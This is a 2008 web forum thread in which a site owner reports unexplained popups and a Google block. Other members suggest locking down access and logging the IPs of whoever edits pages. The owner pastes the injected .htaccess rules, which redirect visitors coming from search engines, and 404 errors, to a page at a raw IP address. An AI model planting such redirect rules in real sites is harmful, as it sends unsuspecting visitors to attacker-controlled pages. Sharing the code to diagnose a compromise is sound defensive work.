Popups On My Site But I Never Added Them And Now Blocked By Google!!!

Discussion in 'HTML & Website Design' started by gobbly2100, Aug 6, 2008.

  1. #1
    Hey guys!

    I just noticed my site is being blocked by Google and has a popup if you visit the site through a search on Google.

    How has somebody added this and where should I look for whatever has been added? I can't see anything obvious.

    www.HuxleyGame.com
     
    gobbly2100, Aug 6, 2008 IP
  2. scubita

    scubita Peon

    Messages:
    5,550
    Likes Received:
    318
    Best Answers:
    0
    Trophy Points:
    0
    #2
    Another thread about this?
     
    scubita, Aug 6, 2008 IP
  3. sucka

    sucka Well-Known Member

    Messages:
    298
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    105
    #3
    I can´t see ur site cause it might have an endless loop in it.

    But I guess ur site is hosted on a free host with ads.

    Probably ...
     
    sucka, Aug 6, 2008 IP
  4. gobbly2100

    gobbly2100 Banned

    Messages:
    906
    Likes Received:
    11
    Best Answers:
    0
    Trophy Points:
    0
    #4
    Some idiots put this code in my .htaccess

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    RewriteRule .* http://87.248.180.88/in.html?s=hg [R,L]
    Errordocument 404 http://87.248.180.88/in.html?s=hg_err
    Code (markup):
    They need to sort their lives out if they have nothing better to do . . .
     
    gobbly2100, Aug 6, 2008 IP
  5. Affilit

    Affilit Peon

    Messages:
    70
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    0
    #5
    The question I would be asking is how they got in there.
    You not got your back end locked down.
    Or is there more than one of you updating the site. (This is usually the case when your )

    The amount of times a client has said have you altered my site and when I asked them who new the login details the penny usually.

    Always best to have last logged in IP address on the back end so you know who it is.
     
    Affilit, Aug 6, 2008 IP
  6. pokey

    pokey Active Member

    Messages:
    317
    Likes Received:
    9
    Best Answers:
    0
    Trophy Points:
    60
    #6
    Affilit is right gobbly. It seems like your entrance is not closed, bolted and padlocked shut. I would Google around for a few security tools like a script that records IP Address and as Affilit mentioned, something that records the IP address of the user uploading/modifying pages on your root. If you use cPanel, they automatically do this.
     
    pokey, Aug 6, 2008 IP